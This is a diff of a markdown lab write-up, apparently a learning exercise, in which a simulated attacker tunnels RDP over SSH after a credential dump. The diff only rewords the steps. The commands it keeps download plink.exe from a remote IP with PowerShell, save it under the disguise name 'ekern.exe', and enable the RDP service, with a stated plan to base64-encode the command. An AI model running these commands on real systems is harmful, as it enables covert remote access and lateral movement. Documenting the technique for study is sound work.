ahmedosamaelshimy/FirstLab/SketchingTheAttack.md

 ![image](https://github.com/user-attachments/assets/e3649426-ec9b-4fd8-a3e3-0a0ce7b1acd6)

-### 3. now we have the dump, we will skip the process of fetching the passwords for now, Lets Go to the next step where the attacker start tunnelling RDP connections over SSH
+### 3. now we have the dump, we will skip the process of fetching the passwords for now, Lets Go to the next step where the attacker starts tunneling RDP connections over SSH

-a. first we will be downloading `plink.exe` as `ekern.exe`
+a.
+First, we will download `plink.exe` as `ekern.exe`
 ```
 powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:9000/file.exe', 'C:\windows\temp\ekern.exe')
 ```

-b. by Default RDP is Disabled let's Check first
+b.
+By default, RDP is Disabled.
+Let's check first
 ```
 Get-Service -Name TermService
 ```

 ![image](https://github.com/user-attachments/assets/2c8d0804-16c5-4961-9e13-6179a61d723d)

-c. enable RDP but let's base64 encode this and put it in one-line command
+c.
+Enable RDP, but let's base64 encode this and put it in one-line command

 ```
 Set-Service -Name TermService -StartupType Automatic